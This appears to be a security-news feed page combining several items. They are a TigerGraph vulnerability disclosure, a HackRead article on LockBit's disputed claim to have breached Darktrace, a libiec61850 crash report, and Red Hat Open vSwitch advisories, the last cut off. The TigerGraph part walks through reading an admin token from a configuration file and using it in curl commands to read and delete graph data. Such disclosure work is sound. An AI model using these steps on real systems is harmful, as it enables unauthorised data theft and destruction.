An issue was discovered in TigerGraph Enterprise Free Edition 3.x. It creates an authentication token for internal systems use. This token can be read from the configuration file. Using this token on the REST API provides an attacker with anonymous admin-level privileges on all REST API endpoints.

The TigerGraph platform provides users with a REST API that allows authenticated users the ability to load data into the database, query the database, and update the database.

This report highlights that an authentication token – that is used internally by the TigerGraph system – can be read from configuration files stored on the TigerGraph platform. And that anyone using this token is granted administrative privileges across all REST API endpoints. Thereby, allowing an attackerto read and write to any graph in the platform.

**Impact**

Severe.

Unauthorized users can exfiltrate or corrupt any data contained within the TigerGraph platform.

**Products/Versions Affected**

*   TigerGraph Enterprise Free Edition 3.7.0 Docker Image
*   TigerGraph Enterprise Free Edition 3.7.0
*   TigerGraph Cloud

We suspect that this vulnerability is present in all existing TigerGraph products (although this is not confirmed).

**Steps to Reproduce****Download and Run TigerGraph**

Using docker download at the latest TigerGraph image and start the server:

**1.) Optional: clean-up old TigerGraph docker images and obtain the latest version:**

docker rm tigergraph
docker pull docker.tigergraph.com/tigergraph:latest

**2.) Download and run the docker image (note: we do not need to attach a volume):**

docker run -d 
-p 14022:22 
-p 9000:9000 
-p 14240:14240 
--name tigergraph 
--ulimit nofile=1000000:1000000 
-t docker.tigergraph.com/tigergraph:latest

**3.) Once the container has started, connect to it via ssh (note: the default password is ‘tigergraph’):**

ssh -p 14022 tigergraph@localhost

**4.) Start all TigerGraph services:**

gadmin start all

**5.) Using GSQL, create a new graph called test and add a node to it:**

 $ gsql
GSQL> CREATE VERTEX Node(PRIMARY\_ID id UINT, value STRING) WITH primary\_id\_as\_attribute="true"
GSQL> CREATE GRAPH test(\*)
GSQL> begin
GSQL> CREATE QUERY ins(UINT id, STRING value) FOR GRAPH test {
GSQL>   INSERT INTO Node VALUES(id, value);
GSQL> }
GSQL> end
GSQL> interpret query ins(1,"hello”)

**6.) Enable RESTPP authentication**

gadmin config set RESTPP.Factory.EnableAuth true
gadmin config apply -y
gadmin restart restpp nginx gui gsql -y

**Obtaining Administrative Credentials**

To demonstrate that the administrative level web credentials are readily obtainable we download them via the AdminPortal. Although, this step assumes that the login credentials of the administrative user are known; a situation that is plausible (see CVE-2022-xxxxx which details how to locate the login credentials of the administrative user within the system logs).

If however, the login credentials are not known, the web credentials can also be exfiltrated from the TigerGraph platform using the technique described in CVE-2022-xxxxx where a user with low-levels of privilege is able to exploit a weakness in GSQL to load data from arbitrary files into the database. We also found that it is possible to exfiltrate these web credentials under normal operating conditions by exploiting GSQL’s UDF facility to read arbitrary files (see CVE-2022-30331).

**Login To The AdminPortal**

The simplest way to obtain the administrative users login credentials is using AdminStudio and to do this follow these steps:

**1.) Open a web-browser and go to http://localhost:14240 where you will be able to login to GraphStudio using the tigergraph user:**

**2.) Click on the “Admin” button on the top-right corner to switch into administrative mode (called the AdminPortal).**

**Downloading Web Credentials via AdminPortal**

Once logged into the AdminPortal follow the following steps to download the TigerGraph configuration file:

1.  On the left-hand side expand the “Others” menu.
2.  Click on “GSQL Output File” to open the file preview pane.
3.  In the “File path” textbox enter the text “/home/tigergraph/tigergraph/data/configs/tg.cfg“.
4.  Click “Preview” to check that the file exists – if it does the first few lines will be displayed.
5.  Finally, click “Download” and the file will be downloaded to your local computer. On our system it was called m1\_tg.cfg.

**Note**: When tested we found that the GUI was unable to download files that were symbolically linked. So if the files that you download in step 5 are corrupted follow the steps in the next sections to find the location of the actual file.

**Symbolic Linking Issue**

Once logged into AdminPortal perform the following steps:

1.  On the left-hand side expand the “Monitor” menu.
2.  Click on “Logs” to open the window that allows you to search through the system logs.
3.  In the “Pattern” textbox enter the text “LinkFilePath“.
4.  Under components de-select all components except “CONTROLLER”.
5.  Click “Search” to perform the search and return any matches.
6.  Finally, click on any match from the controller log file. (The file name starts “/controller” and ends in “.log”). Doing this will take you to the entry in the log file (shown below).

Once inside the log file you need to locate both the LinkFilePath and the SourceFilePath entries for tg.cfg. In the screenshot above we found these values to be:

*   LinkFilePath:"/home/tigergraph/tigergraph/data/configs/tg.cfg"
*   SourceFilePath:"tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ=="
*   tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ==

Now to construct the absolute file path to the configuration file replace tg.cfg in LinkFilePath to the value specified by SourceFilePath. In our example, this created the following path: /home/tigergraph/tigergraph/data/configs/tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ==

To download this file repeats the same process as described in the section Downloading Web Credentials via AdminPortal but instead use the path that we calculated in this section.

**Using The Administrative Web Token Credentials To Obtain Access**

Once the SSH credentials of the administrative user have been obtained they can be used to authenticate with the remote TigerGraph server and obtain shell access as the administrative user without requiring a password.

**1.) Locate the value of the administrative AuthToken in the configuration file that you obtained. This can either be done using the linux command line as shown below (or opening the file in a text editor and using the in-build find functionality):**

cat m1\_tg.cfg | grep AuthToken

"\\"MaxAuthTokenLifeTimeSec\\": 0",
"\\"AuthToken\\": \\"9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe\\"",

**2.) Do a quick sanity test to check that authentication is enabled on the REST API:**

curl -X GET http://127.0.0.1:9000/graph/test/vertices/Node
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":true,"message":"Access Denied because the input token = '' is empty","code":"REST-10016"}%

**3.) Now we are able to send requests to REST APIs using our administrative AuthToken. Below we use it to return a list of vertices from our test graph:**

curl -X GET \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/Node
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":\[{"v\_id":"1","v\_type":"Node","attributes":{"id":1,"value":"hello"}}\]}%

**4.) We can use these REST endpoints to create/read/updated/delete any graph in the system. Below we use the administrative token to delete a vertex and then do a check it was deleted:**

curl -X DELETE \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/V1
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":{"v\_type":"V1","deleted\_vertices":1}}%

curl -X GET \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/V1
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":\[\]}%

CVE-2023-22951: Unsecured Web Credentials

By Waqas
Is it a highly dubious claim by the infamous LockBit 3.0 ransomware gang? It looks like it!
This is a post from HackRead.com Read the original post: LockBit 3.0 Posts Dubious Claims of Breaching Darktrace Cybersecurity Firm

**Darktrace, a leading cybersecurity firm renowned for its AI-powered threat detection and response solutions, has swiftly dismissed LockBit 3.0’s statements.**

LockBit 3.0, a notorious ransomware gang known for its high-profile and some time making up attacks, has claimed to have successfully hacked, prominent Cambridge, United Kingdom-based Darktrace cybersecurity company.

The gang announced the breach on its dark web portal, where they posted images of Darktrace’s CEO Poppy Gustafsson that are already publicly available. Although LockBit 3.0 claims to have published the alleged stolen data, clicking the download links on the gang’s website only redirects users to Darktrace’s official website.

Screenshot from LockBit 3.0’s website (Credit: Hackread.com)

Darktrace, on the other hand, has issued a statement acknowledging the claims made by LockBit 3.0, but denying any breaches or malicious activity.

> **Our security teams have run a full review of our internal systems and can see no evidence of compromise. None of the LockBit social media posts link to any compromised Darktrace data. We will continue to monitor the situation extremely closely, but based on our current investigations we are confident that our systems remain secure and all customer data is fully protected.**
> 
> Darktrace

LockBit 3.0 has a track record of targeting high-profile organizations, such as a SpaceX contractor, and demanding hefty ransoms for the release of encrypted data. Yet, the group has faced allegations of fabricating claims about compromising new victims. For example, in a similar instance last year, LockBit 3.0 claimed to have breached cybersecurity firm Mandiant, which is owned by Google. However, Mandiant swiftly denied and dismissed the gang’s statements.

There has also been confusion regarding whether LockBit 3.0 initially meant Darktrace or DarkTracer, a Singapore-based threat intelligence and OSINT firm, as their victim. However, it is safe to say that neither Darktrace nor DarkTracer has been targeted or impacted by any breach. Read more about this on Twitter.

> The reliability of the RaaS service operated by LockBit ransomware gang seems to have declined. They appear to have become negligent in managing the service, as fake victims and meaningless data have begun to fill the list, which is being left unattended. pic.twitter.com/mfGhH93oYh
> 
> — Fusion Intelligence Center @ DarkTracer (@darktracer\_int) April 12, 2023

****Ransomware, a growing threat****

In recent years, ransomware attacks have become a major cybersecurity challenge, causing significant financial losses and reputational damage to businesses and organizations worldwide.

These attacks often result in data breaches, operational disruptions, and financial extortion, as victims are left with few options other than paying the ransom or facing severe consequences.

As the cybersecurity landscape continues to evolve, organizations must remain vigilant in their efforts to safeguard their systems and data from cyber threats. This includes implementing robust cybersecurity measures, regularly updating and patching systems, and providing comprehensive employee training on cybersecurity best practices.

1.  Hackers infiltrate Western Digital Internal Systems
2.  New Strain of Rorschach Ransomware Hits US Firms
3.  LockBit blames victim for DDoS attack on its website
4.  UK Criminal Records Office Hit by Ransomware Attack
5.  New Cylance Ransomware Targets Linux and Windows

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

LockBit 3.0 Posts Dubious Claims of Breaching Darktrace Cybersecurity Firm

An issue was discovered in TigerGraph Enterprise Free Edition 3.x. Data loading jobs in gsql_server, created by any user with designer permissions, can read sensitive data from arbitrary locations.

CVE-2023-22950: Data Loading Vulnerability

libiec61850 v1.5.1 was discovered to contain a segmentation violation via the function ControlObjectClient_setOrigin() at /client/client_control.c.

Hi, team  
There is a SEGV in function ControlObjectClient_setOrigin in src/iec61850/client/client_control.c:328 when called from libiec61850/examples/iec61850\_client\_example\_control/client\_example\_control.c:60.

Steps to reproduce:  
I used **gcc 9.4 and AddressSanitizer**(export CFLAGS="-g -fsanitize=address" CXXFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address"before make examples) to build **libiec61850**.  
First, I run the server_example_simple in directory libiec61850/examples/server_example_simple by command sudo ./server_example_simple so that the server is set up.  
Then I tested client_example_control in directory libiec61850/examples/iec61850_client_example_control by command sudo ./client_example_control.  
But I got SEGV in function ControlObjectClient_setOrigin in src/iec61850/client/client_control.c:328.

    $ sudo ./client_example_control
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==12824==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000078 (pc 0x5638e2e178dc bp 0x7ffe9101eb20 sp 0x7ffe9101eb00 T0)
    ==12824==The signal is caused by a READ memory access.
    ==12824==Hint: address points to the zero page.
        #0 0x5638e2e178db in ControlObjectClient_setOrigin src/iec61850/client/client_control.c:328
        #1 0x5638e2e06190 in main /home/saltf1sh/target/libiec61850/examples/iec61850_client_example_control/client_example_control.c:60
        #2 0x7fc4901b70b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
        #3 0x5638e2e05dbd in _start (/home/saltf1sh/target/libiec61850/examples/iec61850_client_example_control/client_example_control+0x26dbd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV src/iec61850/client/client_control.c:328 in ControlObjectClient_setOrigin
    ==12824==ABORTING

CVE-2023-27772: SEGV in function ControlObjectClient_setOrigin() · Issue #442 · mz-automation/libiec61850

Red Hat Security Advisory 2023-1765-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.17 security update  
Advisory ID:       RHSA-2023:1765-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1765  
Issue date:        2023-04-13  
CVE Names:         CVE-2023-1668  
====================================================================  
1. Summary:

An update for openvswitch2.17 is now available in Fast Datapath for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [23.C RHEL-8] Fast Datapath Release (BZ#2177685)

* [CT] Inner header of ICMP related traffic does not get DNATed  
(BZ#2178200)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2177685 - [23.C RHEL-8] Fast Datapath Release  
2178200 - [CT] Inner header of ICMP related traffic does not get DNATed

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch2.17-2.17.0-88.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.aarch64.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.aarch64.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.aarch64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.aarch64.rpm

noarch:  
openvswitch2.17-test-2.17.0-88.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.ppc64le.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.ppc64le.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.ppc64le.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.s390x.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.s390x.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.s390x.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch2.17-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-debuginfo-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-debugsource-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-devel-2.17.0-88.el8fdp.x86_64.rpm  
openvswitch2.17-ipsec-2.17.0-88.el8fdp.x86_64.rpm  
python3-openvswitch2.17-2.17.0-88.el8fdp.x86_64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-88.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDfaINzjgjWX9erEAQiMWg//d9j3aPfYak2tV8EI9xSItFv6WpoLCB4y  
rC4956fWN4hzmKSYHnrw4uvhEVPf1hsue5zJIO0VHlT5MqmwDn6wDjP//V8GC4lE  
JUmTZHQMcWlt/dZQm2mh2I0n4oR0y/4gY3f4kKXUPM0Mg1S1MAEahmm4S9NWAGF7  
f2nVf1b1PACs3E4QfStldiawDDmwPCe8zsaaCCVL9sIR/KZI6yoZOJu8RjCWHac6  
0kw6LpIDjOwoJ/tc2JMoP/1JORzA+6S0Lrg+ZI8Kd0qwL/6KOcBpgCYXYD1eyp60  
18At7rFMonFlOW2JG8A0ewe6MZDXoyJsWjNZl2xPXsa1tHT/jnK29EbXr14X40kx  
/fpSdiRr1zSfChCPFVedxaBWY9L2UoAUGx6TnGXNuNC1UTM0pseMfUMy7TAC4ZV4  
o6qH7hC4a2W1tOxndAq8MWGeh49pq1n/EjwF+deKU73ke834pwDfQFRO03YB4jjM  
myicYpRKimbd6TzFhunIaKJcEYGX5Jna6nBd50a2b5mfHOS/FKah2fmROTK8bRv8  
202/9CCCGWSzE3IlUT9JcamNcdre0xZHmkYXpyLTuW0keXp+wlb19aVR42ZtRq6L  
U+TiznvhSU3XuH7KxJJS0AQdi+zyBWSR24ADbE70nQfu0nP6hupQBo6Eg2dnhdva  
w5iYSsJ1/AA=J+dO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1765-01

Red Hat Security Advisory 2023-1769-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.17 security update  
Advisory ID:       RHSA-2023:1769-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1769  
Issue date:        2023-04-13  
CVE Names:         CVE-2023-1668  
====================================================================  
1. Summary:

An update for openvswitch2.17 is now available in Fast Datapath for Red Hat  
Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 9 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [23.C RHEL-9] Fast Datapath Release (BZ#2177686)

* [CT] Inner header of ICMP related traffic does not get DNATed  
(BZ#2178203)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2177686 - [23.C RHEL-9] Fast Datapath Release  
2178203 - [CT] Inner header of ICMP related traffic does not get DNATed

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 9:

Source:  
openvswitch2.17-2.17.0-77.el9fdp.src.rpm

aarch64:  
openvswitch2.17-2.17.0-77.el9fdp.aarch64.rpm  
openvswitch2.17-debuginfo-2.17.0-77.el9fdp.aarch64.rpm  
openvswitch2.17-debugsource-2.17.0-77.el9fdp.aarch64.rpm  
openvswitch2.17-devel-2.17.0-77.el9fdp.aarch64.rpm  
openvswitch2.17-ipsec-2.17.0-77.el9fdp.aarch64.rpm  
python3-openvswitch2.17-2.17.0-77.el9fdp.aarch64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-77.el9fdp.aarch64.rpm

noarch:  
openvswitch2.17-test-2.17.0-77.el9fdp.noarch.rpm

ppc64le:  
openvswitch2.17-2.17.0-77.el9fdp.ppc64le.rpm  
openvswitch2.17-debuginfo-2.17.0-77.el9fdp.ppc64le.rpm  
openvswitch2.17-debugsource-2.17.0-77.el9fdp.ppc64le.rpm  
openvswitch2.17-devel-2.17.0-77.el9fdp.ppc64le.rpm  
openvswitch2.17-ipsec-2.17.0-77.el9fdp.ppc64le.rpm  
python3-openvswitch2.17-2.17.0-77.el9fdp.ppc64le.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-77.el9fdp.ppc64le.rpm

s390x:  
openvswitch2.17-2.17.0-77.el9fdp.s390x.rpm  
openvswitch2.17-debuginfo-2.17.0-77.el9fdp.s390x.rpm  
openvswitch2.17-debugsource-2.17.0-77.el9fdp.s390x.rpm  
openvswitch2.17-devel-2.17.0-77.el9fdp.s390x.rpm  
openvswitch2.17-ipsec-2.17.0-77.el9fdp.s390x.rpm  
python3-openvswitch2.17-2.17.0-77.el9fdp.s390x.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-77.el9fdp.s390x.rpm

x86_64:  
openvswitch2.17-2.17.0-77.el9fdp.x86_64.rpm  
openvswitch2.17-debuginfo-2.17.0-77.el9fdp.x86_64.rpm  
openvswitch2.17-debugsource-2.17.0-77.el9fdp.x86_64.rpm  
openvswitch2.17-devel-2.17.0-77.el9fdp.x86_64.rpm  
openvswitch2.17-ipsec-2.17.0-77.el9fdp.x86_64.rpm  
python3-openvswitch2.17-2.17.0-77.el9fdp.x86_64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-77.el9fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDfaINzjgjWX9erEAQgdjQ//RB88e003zD0P5VKlgcd8xQcxdHy8WkKp  
BksrNOZnjGEeUw3qyqjQaADC8SlmvEWCg7Vh3wxZvAE30nOQOHLZ3iZufvxHAxi3  
0MSyKGolC2W7jCtgEA3TMVu3yx/Pb5sh02iRh32Bp4q7B76blUt+MqR/6APyAHFP  
EOxCrGL4Uif1rC96U1tlexErOmHRdE/hSso/mw5NtP6E5kt27qiNJEsQC4ep3Csi  
61e6+T/dgH/cHso3t5JNX9zdijrSqJmXfc9G3gGxlfkYgUJo7su04Rpx757ufGi2  
sMKR6cEJJKB7kfyhGFys8txsJhsXG5sAMuLDowHEPn/TBtRq734EFIL+A3ksMUTR  
RmBDUqgycibn3uHkG3MOG9/JhJbCp6xA2B8I74ygWezjvbnLqILHvOzWO8PgXypV  
wIwlGBdtcICL2ORDelPznaCf/SltjFrOg0cOxo1IPIMakHYRsEuocyEnzpRH7IVl  
05x1i964/ur4B6j5m6qVJa9aX3eADHl2Tzkc9ykeYJ/Wv/W+LNksOTuxwRknGxn5  
MmMrMO87eF7uxALARIlo6UjggmT38A39cy/rdrlmT0BUHafLGe8sz7vwhklRwoAw  
GoEsPaDmN4hotvh94Unf89SwSXKKp1S8XG1+DIl091Rg1nkcSudBoC3k4PmYRSY+  
7qP7ZWcYyvk=xchJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1769-01

Red Hat Security Advisory 2023-1766-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch3.1 security update  
Advisory ID:       RHSA-2023:1766-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1766  
Issue date:        2023-04-13  
CVE Names:         CVE-2023-1668  
====================================================================  
1. Summary:

An update for openvswitch3.1 is now available in Fast Datapath for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [23.C RHEL-8] Fast Datapath Release (BZ#2177687)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

Users of openvswitch3.1 are advised to upgrade to these updated packages,  
which fixes these bugs.

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2177687 - [23.C RHEL-8] Fast Datapath Release

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch3.1-3.1.0-17.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch3.1-3.1.0-17.el8fdp.aarch64.rpm  
openvswitch3.1-3.1.0-17.el8fdp.aarch64.rpm  
openvswitch3.1-debuginfo-3.1.0-17.el8fdp.aarch64.rpm  
openvswitch3.1-debugsource-3.1.0-17.el8fdp.aarch64.rpm  
openvswitch3.1-devel-3.1.0-17.el8fdp.aarch64.rpm  
openvswitch3.1-ipsec-3.1.0-17.el8fdp.aarch64.rpm  
python3-openvswitch3.1-3.1.0-17.el8fdp.aarch64.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-17.el8fdp.aarch64.rpm

noarch:  
openvswitch3.1-test-3.1.0-17.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch3.1-3.1.0-17.el8fdp.ppc64le.rpm  
openvswitch3.1-3.1.0-17.el8fdp.ppc64le.rpm  
openvswitch3.1-debuginfo-3.1.0-17.el8fdp.ppc64le.rpm  
openvswitch3.1-debugsource-3.1.0-17.el8fdp.ppc64le.rpm  
openvswitch3.1-devel-3.1.0-17.el8fdp.ppc64le.rpm  
openvswitch3.1-ipsec-3.1.0-17.el8fdp.ppc64le.rpm  
python3-openvswitch3.1-3.1.0-17.el8fdp.ppc64le.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-17.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch3.1-3.1.0-17.el8fdp.s390x.rpm  
openvswitch3.1-3.1.0-17.el8fdp.s390x.rpm  
openvswitch3.1-debuginfo-3.1.0-17.el8fdp.s390x.rpm  
openvswitch3.1-debugsource-3.1.0-17.el8fdp.s390x.rpm  
openvswitch3.1-devel-3.1.0-17.el8fdp.s390x.rpm  
openvswitch3.1-ipsec-3.1.0-17.el8fdp.s390x.rpm  
python3-openvswitch3.1-3.1.0-17.el8fdp.s390x.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-17.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch3.1-3.1.0-17.el8fdp.x86_64.rpm  
openvswitch3.1-3.1.0-17.el8fdp.x86_64.rpm  
openvswitch3.1-debuginfo-3.1.0-17.el8fdp.x86_64.rpm  
openvswitch3.1-debugsource-3.1.0-17.el8fdp.x86_64.rpm  
openvswitch3.1-devel-3.1.0-17.el8fdp.x86_64.rpm  
openvswitch3.1-ipsec-3.1.0-17.el8fdp.x86_64.rpm  
python3-openvswitch3.1-3.1.0-17.el8fdp.x86_64.rpm  
python3-openvswitch3.1-debuginfo-3.1.0-17.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDfaINzjgjWX9erEAQgq0Q//bKc0CM9R2JeB8Czrus6oTHhXpBt+ykbW  
ynNuGnQFwrIK2ToqHAvCXfbavCbP+ENebsxzCfKBzE0kL2KrTq5v/cgcETyWsc2O  
VJ+LxTeYOjuKXObO+aAQujcEpU89FiwXPcdyBr0ayuLof+tLuem78VQoPyDnMBmF  
zB9RIIOjznXOFPhwej8DokAziEVtjgKwWuh1/V4nYquIAFyP7hm4IQ26OkVLxhZG  
LNCXmHYFxwgqXBn9vEmTNuAjRZFHkyIHHH6ShZHwz//tK4EbwW5v+IvQpCa6rkHT  
beZh2ivr7t07J27xheD7AZPmat1dlOBmSo3yy67W9hC2t1YGp0ryaTyq1SZt2+h0  
a8+CF8870BjZidp6tLsRc5EMz+/WSoRatYn92WOfKnAyrMfSXgZvqpq94nv+oYJw  
uLA3FMc2mae7JDWVkl/K1TT8r2b9aUQk8qL0w1onAQComtOFbNzOvWfwQMp2PMZ9  
l13TQpJGEhu5NiXKUeQZvT+XLyuZ80DsyyPES080CQ3IdJ0uCcMpQDb346PJUfG6  
